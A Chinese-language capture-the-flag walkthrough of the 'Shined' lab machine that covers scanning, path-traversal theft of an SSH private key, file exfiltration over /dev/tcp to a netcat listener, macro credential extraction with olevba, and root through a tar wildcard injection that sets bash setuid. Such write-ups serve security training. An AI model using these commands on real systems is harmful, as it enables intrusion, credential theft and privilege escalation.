Shined靶场

arp-scan -l

nmap 192.168.109.133 -p- -sS -sC -n --min-rate 5000 -sV

gobuster dir -u http://192.168.109.133 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,sh,html

id_rsa 文件是 PEM 格式的私钥  

条件：

服务器开放2222端口，才有可能利用

读取id_rsa

?inet=../../../../../../../home/cifra/.ssh/id_rsa

如果攻击者获取了 id_rsa 文件：

1. 直接访问权限攻击者可以使用私钥登录对应的远程服务器，无需输入密码（前提是服务器上配置了匹配的公钥 id_rsa.pub）。

2. 权限滥用

• 如果服务器的 ~/.ssh/authorized_keys 文件包含了与该私钥匹配的公钥，攻击者将获得完全的访问权限。

• 可能被用于进一步的横向渗透攻击。

vi id_rsa //把私钥粘贴过去注意粘贴时候第一行的空格，去掉！！！！chmod 600 id_rsassh [email protected] -i id_rsa -p 2222

查看有个文件contabilidad.xlsm

服务端：

cat contabilidad.xlsm > /dev/tcp/192.168.109.128/6666

本地：

开启监听(优先开)

nc -vlp 6666 > 自定义文件名

上传到本地后

安装oletools才可以使用ol

pip install -U oletools

olevba contabilidad.xlsm //分析

用户名和密码拿到

登录

ifconfigssh [email protected]

然后拿到第一个user用户标志

73f5b965bd7e817a71b853f44ada19b0

本地：

把文件传到本地上去，再从服务器去拉

service apache2 start //开启Apache服务

一定要到tmp目录下，因为权限高

dpkg -L 命令安装包位置cp /var/www/html //上传到网站上面

下载

服务器：

cd /tmpwget http://ip/文件名

传了一个pspy,查看服务器的进程文件

chmod 777 pspy32./papy32

看到这个基本上就知道利用点是什么了tgz

cd 到tmp目录下一个backup.sh*文件，查看一下

cd /tmpllcat /tmp/backuo.sh

先到这个目录

cd /home/leopoldo/Desktop/scripts/

echo'chmod +s /bin/bash' > a.shtouch -- '--checkpoint-action=exec=sh a.sh'touch -- '--checkpoint=1'

ls -la /bin/bashbash -p

等个几秒，就执行成功了

后面到root目录拿flag

01d940a42e6a3f5727e2382d9f4f3b87

今天打这个靶场确实挺麻烦的，有很多新知识点，不过还好。

注：鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。